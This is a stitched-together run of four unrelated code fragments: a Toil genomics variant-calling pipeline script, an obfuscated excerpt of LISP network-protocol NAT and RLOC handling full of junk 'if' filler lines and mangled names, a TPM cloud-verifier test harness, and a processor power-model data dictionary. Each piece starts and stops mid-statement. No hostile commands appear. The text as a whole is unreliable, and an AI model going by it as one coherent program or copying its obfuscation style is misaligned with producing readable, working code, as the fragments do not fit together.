"{}".format(config['vcfanno']['lua']),
"{}".format(samples[name]['vcfanno_config']),
"{}".format(input_vcf),
">",
"{}".format(output_vcf)]
job.fileStore.logToMaster("VCFAnno Command: {}\n".format(command))
run_and_log_command(" ".join(command), logfile)
return output_vcf
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--samples_file', help="Input configuration file for samples")
parser.add_argument('-c', '--configuration', help="Configuration file for various settings")
parser.add_argument('-a', '--address', help="IP Address for Cassandra connection", default='127.0.0.1')
parser.add_argument('-u', '--username', help='Cassandra username for login', default=None)
Job.Runner.addToilOptions(parser)
args = parser.parse_args()
args.logLevel = "INFO"
cwd = os.getcwd()
sys.stdout.write("Setting up analysis directory\n")
# if not os.path.exists("Logs"):
# os.makedirs("Logs")
# if not os.path.exists("FinalVCFs"):
# os.makedirs("FinalVCFs")
# if not os.path.exists("FinalBAMs"):
# os.makedirs("FinalBAMs")
# if not os.path.exists("Intermediates"):
# os.makedirs("Intermediates")
# if not os.path.exists("Coverage"):
# os.makedirs("Coverage")
# if not os.path.exists("Reports"):
# os.makedirs("Reports")
sys.stdout.write("Parsing configuration data\n")
config = configuration.configure_runtime(args.configuration)
sys.stdout.write("Parsing sample data\n")
samples = configuration.configure_samples(args.samples_file, config)
if args.username:
password = <PASSWORD>()
auth_provider = PlainTextAuthProvider(username=args.username, password=password)
else:
auth_provider = None
# Workflow Graph definition. The following workflow definition should create a valid Directed Acyclic Graph (DAG)
root_job = Job.wrapJobFn(spawn_batch_jobs, cores=1)
fastqc_job = Job.wrapJobFn(run_fastqc, config, samples)
# Per sample jobs
for sample in samples:
# Alignment and Refinement Stages
align_job = Job.wrapJobFn(run_bwa_mem, config, sample, samples,
cores=int(config['bwa']['num_cores']),
memory="{}G".format(config['bwa']['max_mem']))
add_job = Job.wrapJobFn(add_or_replace_readgroups, config, sample, align_job.rv(),
cores=1,
memory="{}G".format(config['picard-add']['max_mem']))
creator_job = Job.wrapJobFn(realign_target_creator, config, sample, add_job.rv(),
cores=int(config['gatk-realign']['num_cores']),
memory="{}G".format(config['gatk-realign']['max_mem']))
realign_job = Job.wrapJobFn(realign_indels, config, sample, add_job.rv(), creator_job.rv(),
cores=1,
memory="{}G".format(config['gatk-realign']['max_mem']))
recal_job = Job.wrapJobFn(recalibrator, config, sample, realign_job.rv(),
cores=int(config['gatk-recal']['num_cores']),
memory="{}G".format(config['gatk-recal']['max_mem']))
coverage_job = Job.wrapJobFn(sambamba_region_coverage, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['gatk']['num_cores']),
memory="{}G".format(config['gatk']['max_mem']))
# Variant Calling
spawn_variant_job = Job.wrapJobFn(spawn_batch_jobs)
freebayes_job = Job.wrapJobFn(freebayes_single, config, sample,
"{}.recalibrated.sorted.bam".format(sample),
cores=1,
memory="{}G".format(config['freebayes']['max_mem']))
mutect_job = Job.wrapJobFn(mutect_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=1,
memory="{}G".format(config['mutect']['max_mem']))
vardict_job = Job.wrapJobFn(vardict_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['vardict']['num_cores']),
memory="{}G".format(config['vardict']['max_mem']))
scalpel_job = Job.wrapJobFn(scalpel_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['scalpel']['num_cores']),
memory="{}G".format(config['scalpel']['max_mem']))
platypus_job = Job.wrapJobFn(platypus_single, config, sample, samples,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['platypus']['num_cores']),
memory="{}G".format(config['platypus']['max_mem']))
pindel_job = Job.wrapJobFn(run_pindel, config, sample,
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['pindel']['num_cores']),
memory="{}G".format(config['pindel']['max_mem']))
# Need to filter for on target only results somewhere as well
spawn_normalization_job = Job.wrapJobFn(spawn_batch_jobs)
normalization_job1 = Job.wrapJobFn(vt_normalization, config, sample, "freebayes",
"{}.freebayes.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job2 = Job.wrapJobFn(vt_normalization, config, sample, "mutect",
"{}.mutect.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job3 = Job.wrapJobFn(vt_normalization, config, sample, "vardict",
"{}.vardict.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job4 = Job.wrapJobFn(vt_normalization, config, sample, "scalpel",
"{}.scalpel.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job5 = Job.wrapJobFn(vt_normalization, config, sample, "platypus",
"{}.platypus.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
normalization_job6 = Job.wrapJobFn(vt_normalization, config, sample, "pindel",
"{}.pindel.vcf".format(sample),
cores=1,
memory="{}G".format(config['gatk']['max_mem']))
callers = "freebayes,mutect,vardict,scalpel,platypus,pindel"
merge_job = Job.wrapJobFn(merge_variant_calls, config, sample, callers, (normalization_job1.rv(),
normalization_job2.rv(),
normalization_job3.rv(),
normalization_job4.rv(),
normalization_job5.rv(),
normalization_job6.rv()))
gatk_annotate_job = Job.wrapJobFn(annotate_vcf, config, sample, merge_job.rv(),
"{}.recalibrated.sorted.bam".format(sample),
cores=int(config['gatk-annotate']['num_cores']),
memory="{}G".format(config['gatk-annotate']['max_mem']))
gatk_filter_job = Job.wrapJobFn(filter_variants, config, sample, gatk_annotate_job.rv(),
cores=1,
memory="{}G".format(config['gatk-filter']['max_mem']))
snpeff_job = Job.wrapJobFn(snpeff, config, sample, "{}.filtered.vcf".format(sample),
cores=int(config['snpeff']['num_cores']),
memory="{}G".format(config['snpeff']['max_mem']))
vcfanno_job = Job.wrapJobFn(vcfanno, config, sample, samples,
"{}.snpEff.{}.vcf".format(sample, config['snpeff']['reference']),
cores=int(config['vcfanno']['num_cores']),
memory="{}G".format(config['vcfanno']['max_mem']))
# Create workflow from created jobs
root_job.addChild(align_job)
# align_job.addChild(add_job)
# add_job.addChild(creator_job)
# creator_job.addChild(realign_job)
# realign_job.addChild(recal_job)
#
# recal_job.addChild(spawn_variant_job)
#
# spawn_variant_job.addChild(coverage_job)
# spawn_variant_job.addChild(freebayes_job)
# spawn_variant_job.addChild(mutect_job)
# spawn_variant_job.addChild(vardict_job)
# spawn_variant_job.addChild(scalpel_job)
# spawn_variant_job.addChild(platypus_job)
# spawn_variant_job.addChild(pindel_job)
#
# spawn_variant_job.addFollowOn(spawn_normalization_job)
#
# spawn_normalization_job.addChild(normalization_job1)
# spawn_normalization_job.addChild(normalization_job2)
# spawn_normalization_job.addChild(normalization_job3)
# spawn_normalization_job.addChild(normalization_job4)
# spawn_normalization_job.addChild(normalization_job5)
# spawn_normalization_job.addChild(normalization_job6)
#
# spawn_normalization_job.addFollowOn(merge_job)
#
# merge_job.addChild(gatk_annotate_job)
# gatk_annotate_job.addChild(gatk_filter_job)
# gatk_filter_job.addChild(snpeff_job)
# | |
self . mweight ) )
if 98 - 98: II111iiii - i1IIi - ooOoO0o
if 36 - 36: IiII + o0oOOo0O0Ooo
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
O0O00O = self . rloc_name
if ( cour ) : O0O00O = lisp_print_cour ( O0O00O )
return ( 'rloc-name: {}' . format ( blue ( O0O00O , cour ) ) )
if 81 - 81: OOooOOo / I11i % oO0o + ooOoO0o
if 10 - 10: oO0o / i11iIiiIii
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
OOo0000o0 = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 73 - 73: OoO0O00 - i1IIi
if 52 - 52: I1ii11iIi11i
if 4 - 4: Ii1I - iII111i + i1IIi - I1Ii111 / iII111i . Oo0Ooo
if 18 - 18: oO0o % iIii1I11I1II1 + ooOoO0o
i1IIIIi1Ii111 = self . rloc
if ( i1IIIIi1Ii111 . is_null ( ) == False ) :
IiiiI11I1 = lisp_get_nat_info ( i1IIIIi1Ii111 , self . rloc_name )
if ( IiiiI11I1 ) :
OOo0000o0 = IiiiI11I1 . port
i11IIi = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
OoOOoooO000 = i1IIIIi1Ii111 . print_address_no_iid ( )
I111I = red ( OoOOoooO000 , False )
IiiiI1i = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 62 - 62: OoooooooOO + OoO0O00 . IiII
if 41 - 41: OoooooooOO + oO0o % oO0o / I1ii11iIi11i
if 86 - 86: i1IIi
if 73 - 73: iIii1I11I1II1 * Oo0Ooo
if 54 - 54: oO0o . Ii1I
if 31 - 31: I11i
if ( IiiiI11I1 . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( I111I , OOo0000o0 , IiiiI1i ) )
if 60 - 60: Oo0Ooo - iII111i . II111iiii % ooOoO0o / OoooooooOO / iIii1I11I1II1
if 23 - 23: I11i + iIii1I11I1II1
IiiiI11I1 = None if ( IiiiI11I1 == i11IIi ) else i11IIi
if ( IiiiI11I1 and IiiiI11I1 . timed_out ( ) ) :
OOo0000o0 = IiiiI11I1 . port
I111I = red ( IiiiI11I1 . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( I111I , OOo0000o0 ,
# I1Ii111 * OoOoOO00 . I1Ii111 / o0oOOo0O0Ooo
IiiiI1i ) )
IiiiI11I1 = None
if 41 - 41: o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
if 4 - 4: I1Ii111
if 85 - 85: iIii1I11I1II1 % Oo0Ooo
if 20 - 20: IiII + i11iIiiIii * OOooOOo
if 27 - 27: O0 * OoO0O00 * I1ii11iIi11i
if 40 - 40: O0 + oO0o - ooOoO0o + I1IiiI - IiII
if 60 - 60: I1Ii111 * OoO0O00 * oO0o + oO0o
if ( IiiiI11I1 ) :
if ( IiiiI11I1 . address != OoOOoooO000 ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( I111I , red ( IiiiI11I1 . address , False ) ) )
if 34 - 34: o0oOOo0O0Ooo
self . rloc . store_address ( IiiiI11I1 . address )
if 76 - 76: oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
I111I = red ( IiiiI11I1 . address , False )
OOo0000o0 = IiiiI11I1 . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( I111I , OOo0000o0 , IiiiI1i ) )
if 51 - 51: II111iiii / OoOoOO00
self . store_translated_rloc ( i1IIIIi1Ii111 , OOo0000o0 )
if 69 - 69: i11iIiiIii
if 77 - 77: I1ii11iIi11i % OoooooooOO - Oo0Ooo - Ii1I + I11i
if 93 - 93: I1IiiI % O0 * OoO0O00 % OoOoOO00 . I1Ii111 * I1IiiI
if 95 - 95: IiII + o0oOOo0O0Ooo - o0oOOo0O0Ooo
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 83 - 83: ooOoO0o
if 59 - 59: I1ii11iIi11i
if 26 - 26: I11i . Ii1I
if 94 - 94: ooOoO0o . I1IiiI + IiII % I1IiiI / o0oOOo0O0Ooo % o0oOOo0O0Ooo
self . rle = rloc_record . rle
if ( self . rle ) :
for i1ooOoO in self . rle . rle_nodes :
O0O00O = i1ooOoO . rloc_name
IiiiI11I1 = lisp_get_nat_info ( i1ooOoO . address , O0O00O )
if ( IiiiI11I1 == None ) : continue
if 21 - 21: O0 / OOooOOo - II111iiii + I1ii11iIi11i / OoooooooOO
OOo0000o0 = IiiiI11I1 . port
Ooo000oo0OO0 = O0O00O
if ( Ooo000oo0OO0 ) : Ooo000oo0OO0 = blue ( O0O00O , False )
if 81 - 81: i11iIiiIii / Oo0Ooo * i1IIi + OoO0O00 + O0 % I1ii11iIi11i
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( OOo0000o0 ,
# iII111i
i1ooOoO . address . print_address_no_iid ( ) , Ooo000oo0OO0 ) )
i1ooOoO . translated_port = OOo0000o0
if 94 - 94: i11iIiiIii
if 90 - 90: iII111i + i11iIiiIii + iII111i % I1IiiI % oO0o
if 71 - 71: ooOoO0o + OOooOOo * I1IiiI % I11i . I1Ii111 % OoooooooOO
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 7 - 7: iIii1I11I1II1
if 88 - 88: ooOoO0o
if 37 - 37: ooOoO0o * OoOoOO00 . ooOoO0o
if 47 - 47: iIii1I11I1II1 + iIii1I11I1II1 / Ii1I
I11II1iiIIIIiI = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 76 - 76: iIii1I11I1II1 . iIii1I11I1II1 / OOooOOo / OoOoOO00 / iII111i / II111iiii
if ( rloc_record . keys != None and I11II1iiIIIIiI ) :
i1IIiI1iII = rloc_record . keys [ 1 ]
if ( i1IIiI1iII != None ) :
OoOOoooO000 = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( OOo0000o0 )
if 64 - 64: i1IIi * II111iiii + I1ii11iIi11i + OOooOOo % I1ii11iIi11i - OoooooooOO
i1IIiI1iII . add_key_by_rloc ( OoOOoooO000 , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( OoOOoooO000 , False ) ) )
if 96 - 96: IiII + oO0o / Oo0Ooo + OoooooooOO
if 53 - 53: Ii1I * IiII + Oo0Ooo + i11iIiiIii - iIii1I11I1II1
if 66 - 66: O0 - I1ii11iIi11i * iIii1I11I1II1 - I1Ii111 / I1ii11iIi11i
return ( OOo0000o0 )
if 24 - 24: Ii1I
if 39 - 39: O0 % Ii1I
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 63 - 63: OOooOOo / I1ii11iIi11i
if 11 - 11: O0 % iIii1I11I1II1
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 64 - 64: OoOoOO00 - oO0o
if 8 - 8: i11iIiiIii - iIii1I11I1II1 / I1Ii111 . i11iIiiIii % o0oOOo0O0Ooo / oO0o
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 36 - 36: IiII
return ( True )
if 53 - 53: OoooooooOO / I1IiiI % I11i + Oo0Ooo
if 15 - 15: O0
def is_rtr ( self ) :
return ( ( self . priority == | |
except Exception as e:
self.fail("Problem reading backup persistence file after POST. Error: %s"%e)
def check_test_persistance_file_load(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
uuid_str = argument
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if len(jsondecoded) != 1 or jsondecoded.get(uuid_str) is None :
self.fail("Expected " + uuid_str + " to be in the list of active agent_ids")
# def do_mock_for_test_cloudverifier_tenant_provide_v(self, argument):
# global text_callback
# nonce = tpm_initialize.random_password(20)
# tpm_policy = {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff" }
# #theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier" + "?nonce=" + nonce + "&mask=" + tpm_policy['mask']
# theurl = 'http://' + cloudagent_ip + ':' + cloudagent_port + "/v1/quotes/cloudverifier"
# with requests_mock.Mocker(real_http=True) as m:
# m.get(requests_mock.ANY, text=text_callback)
def provide_e(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
response_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(response_body)
public_key = jsondecoded.get("pubkey")
quote = jsondecoded.get("quote")
# test to make sure these two keys (and values) are in the return
if public_key == None or quote == None:
self.fail("Expected both pubkey and quote arguments." )
else:
mytenant = tenant.Tenant()
# command line options can overwrite config values
mytenant.cloudagent_ip = cloudagent_ip
mytenant.cloudverifier_ip = cloudverifier_ip
mytenant.agent_uuid = "C432FBB3-D2F1-4A97-9EF7-75BD81C866E9"
if mytenant.validate_tpm_quote(public_key, quote):
# encrypt U with the public key
global U, K
encrypted_U = crypto.rsa_encrypt(crypto.rsa_import_pubkey(public_key),str(U))
encrypt_check = crypto.do_hmac(K,mytenant.agent_uuid)
b64_encrypted_u = base64.b64encode(encrypted_U)
data = {
'encrypted_key': b64_encrypted_u,
'encrypt_check': encrypt_check
}
u_json_message = json.dumps(data)
#post encrypted U back to Cloud Agent
response = tornado_requests.request("POST", "http://%s:%s/v1/quotes/tenant"%(cloudagent_ip,cloudagent_port),data=u_json_message)
if response.status_code != 200:
self.fail("Posting of Encrypted U to the Cloud Agent failed with response code %d" %response.status_code )
else:
self.fail("TPM Quote from cloud agent is invalid for nonce: %s"%self.nonce )
def check_test_cloudagent_tenant_get_nonce(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#perform each of the test functions and store the results
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
# test to make sure these two keys (and values) are in the return
if jsondecoded.get("pubkey") == None or jsondecoded.get("quote") == None:
self.fail("Expected both pubkey and quote arguments." )
def check_validate_test_cloudverifier_tenant_provide_v(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
jsondecoded = json.loads(target_body)
v = jsondecoded.get("v")
ip = jsondecoded.get("ip")
port = jsondecoded.get("port")
tpm_policy = jsondecoded.get("tpm_policy")
if v is None or v != "nsRIy93UeeAi3GhAxpEcMH6R7OmaB7ArBdn2bEgyEwU=":
self.fail("Returned v from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if ip is None or ip != "127.0.0.1":
self.fail("Returned ip from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if port is None or port != "8882":
self.fail("Returned port from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
if tpm_policy is None or tpm_policy != {"00": "0000000000000000000000000000000000000000", "mask": "0x400801", "22": "ffffffffffffffffffffffffffffffffffffffff"}:
self.fail("Returned tpm_policy from instance 06480EC4-6BF3-4F00-8323-FE6AE5868297 was not correct.")
def check_and_delete_all_entries(self, test_method_name, test_function_name, state_change_or_validation, test_iteration, argument):
test_record = self.test_table.get(test_method_name)
#lookup test data and compare the results to canned values
for test_functions in test_record[state_change_or_validation]:
if test_functions.get("function_name") == test_function_name:
target_body = test_functions.get("http_result_body_actual")
agent_id_list = json.loads(target_body)
expected_len = argument
actual_len = len(agent_id_list)
if actual_len != expected_len:
self.fail("Expected " + str(expected_len) +" instance id's but received " + str(actual_len))
for agent_id in agent_id_list:
params = {
'agent_id': agent_id,
}
try:
response = tornado_requests.request("DELETE",
"http://" + cloudverifier_ip + ":" + cloudverifier_port + "/v1/instances",
params=params)
if response.status_code != 200:
self.fail("Delete of agent_id " + agent_id + " failed.")
except Exception as e:
self.fail("Delete of agent_id " + agent_id + " failed with exception: %s"%e)
def execute_the_test(self, setup_or_state_change_or_validation, test_functions, test_iteration ):
# call the pre_function
pre_function = test_functions.get("pre_function")
if pre_function is not None:
pre_function_name = pre_function.get('name')
pre_function_args = pre_function.get('args')
function_return = getattr(self, pre_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, pre_function_args) #self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, check_argument
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + pre_function_name + " pre_function failure, test aborted." )
full_url = "http://" + test_functions.get("http_request_ip") + ":" + test_functions.get("http_request_port") + test_functions.get("http_request_path")
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
verb = test_functions.get("http_request_verb")
query = test_functions.get("http_request_query","")
test_functions.get("http_request_header")
req_header = test_functions.get("http_request_header")
response = tornado_requests.request(verb, full_url,
params=query,
data=thedata,
headers=req_header)
temp = tempfile.TemporaryFile()
for chunk in response.iter_content(1024):
temp.write(chunk)
temp.seek(0)
# copy the results for future checking
test_functions["http_result_status_actual"] = response.status_code
test_functions["http_result_header_actual"] = response.headers
test_functions["http_result_body_actual"] = temp.read()
#validate response status
if test_functions["http_result_status_actual"] != test_functions["http_result_status_expected"]:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " expected " + str(test_functions["http_result_status_expected"]) + " but received " + str(test_functions["http_result_status_actual"])) # reset the file marker for reading
#validate response headers
if test_functions.get("http_result_header_expected") is not None and not (all(item in response.headers.items() for item in test_functions["http_result_header_expected"].items())):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive expected headers.")
#validate (shallow) response body
if test_functions.get("http_result_body_expected") is not None and json.loads(test_functions.get("http_result_body_expected")) != json.loads(test_functions.get("http_result_body_actual")):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
#validate (deep) response body
check_function = test_functions.get("check_function")
if check_function is not None:
check_argument = check_function.get("argument")
if getattr(self, check_function["name"])(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, check_argument):
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", didn't receive exact expected result body.")
# call the post_function
post_function = test_functions.get("post_function")
if post_function is not None:
post_function_name = post_function.get('name')
post_function_args = post_function.get('args')
function_return = getattr(self, post_function_name)(self._testMethodName, test_functions["function_name"], setup_or_state_change_or_validation, test_iteration, post_function_args)
if function_return == False:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ":" + post_function_name + " post_function failure, test aborted." )
temp.close()
def request_task(self, queue, setup_or_state_change_or_validation, test_functions, test_iteration):
try:
# Table data does not provide ability to inject unique agent_id's for each concurrent instance.
# The queue stores unique agent_id objects, injected by the new_thread function.
# Get the agent_id from the Queue and modify the original table data to change the agent_id to something unique.
http_request_body_tag = test_functions.get("http_request_body")
http_request_body_file_tag = test_functions.get("http_request_body_file")
if http_request_body_tag != None and http_request_body_file_tag != None :
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + " contains both http_request_body and http_request_body_file tags." )
thedata = ''
if http_request_body_tag == None and http_request_body_file_tag != None:
thedata = open(http_request_body_file_tag).read()
else:
thedata=http_request_body_tag
the_uid = queue.get()
jsondata = json.loads(thedata)
jsondata['agent_id'] = the_uid
newdata = json.dumps(jsondata)
# call the inline task passing the new data with the unique agent_id
self.execute_the_test(setup_or_state_change_or_validation, test_functions, test_iteration )
except Exception as e:
self.fail("Test " + self._testMethodName + ":" + test_functions["function_name"] + ", unexpected exception error: %s"%e )
finally:
queue.task_done()
def modify_persistence_file(self, argument):
string_to_write = None
if isinstance(argument, dict):
string_to_write = json.dumps(argument)
elif isinstance(argument, str):
string_to_write = argument
elif isinstance(argument, file):
string_to_write = argument.read()
argument.close()
elif argument is None:
if os.path.isfile(cv_persistence_filename):
os.remove(cv_persistence_filename)
if string_to_write is not None:
with open(cv_persistence_filename, "w") as persistance_file:
persistance_file.write(string_to_write)
backup_file_name = cv_persistence_filename + ".bak"
if os.path.isfile(backup_file_name):
os.remove(backup_file_name)
def launch_cloudverifier(self, argument):
readKUV()
#modify the persistence file per the passed argument
if argument is not None:
string_to_write = self.modify_persistence_file(argument)
global cv_process
cv_process = subprocess.Popen("python cloud_verifier.py", shell=True)
time.sleep(1)
return True
def overwrite_config_file(self, path, section, option, value):
parser = ConfigParser.RawConfigParser()
parser.read(path)
parser.set(section, option, value)
# Writing our configuration file to 'example.ini'
with open(path, 'wb') as configfile:
parser.write(configfile)
def launch_cloudagents(self, argument):
#self.launch_cloudverifier(None)
port_file = argument.get('port_file')
cloudagent_start_port = argument.get('starting_port')
num_cloudagent_instances = argument['num_cloudagent_instances']
if cloudagent_start_port | |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.221497,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.376662,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.28152,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.538558,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.932588,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.534866,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.00601,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.335867,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.789,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.242107,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0195232,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.22063,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.144386,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.462738,
'Execution Unit/Register Files/Runtime Dynamic': 0.163909,
